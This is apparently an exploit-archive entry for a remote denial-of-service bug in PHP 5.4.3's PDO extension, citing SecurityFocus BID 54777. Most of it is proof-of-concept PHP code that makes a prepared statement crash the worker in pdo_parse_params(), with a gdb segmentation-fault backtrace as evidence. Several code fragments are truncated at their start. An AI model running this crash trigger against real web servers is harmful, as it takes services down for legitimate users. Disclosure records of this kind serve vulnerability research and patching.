source: https://www.securityfocus.com/bid/54777/info PHP is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users. PHP 5.4.3 is vulnerable; other versions may also be affected. prepare("SELECT * from 'user'".mysql_real_escape_string($_GET['query'])); $stmt->execute(); //crash $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256); $stmt->fetch(PDO::FETCH_BOUND); print_r( $type); } catch (Exception $e) { echo "Failed: " . $e->getMessage(); } ?> ----- prepare($sql); $stmt->execute(); // crashes php worker in pdo_parse_params() $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256); $stmt->fetch(PDO::FETCH_BOUND); print_r( $type); } catch (Exception $e) { echo "Failed: " . $e->getMessage(); } ?> ---

prepare($sql);
echo "prepared :)\n";
print_r($stmt);
$stmt->execute();     // crashes php worker in pdo_parse_params()
print_r($stmt);
echo "executed :(\n";
$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
$stmt->fetch(PDO::FETCH_BOUND);
echo "--data-\n";
print_r( $type);
echo "--data--\n";

} catch (Exception $e) {
        echo "EXCEPTION";
  echo "Failed: " . $e->getMessage();
}
echo "hmmm end\n";
?>

Actual result: -------------- root@bt:/opt/lampp# gdb ./bin/php (gdb) run poc_pdo_linux_short_1.php Starting program: /opt/lampp/bin/php /opt/lampp/poc_pdo_linux_short_1.php [Thread debugging using libthread_db enabled] Program received signal SIGSEGV, Segmentation fault. 0x08228a81 in ?? () (gdb) bt #0 0x08228a81 in ?? () #1 0x082280eb in pdo_parse_params () #2 0x08223891 in ?? () #3 0x084b2aad in ?? () #4 0x084b1f87 in execute () #5 0x08490ed2 in zend_execute_scripts () #6 0x0843f13c in php_execute_script () #7 0x08506b46 in main ()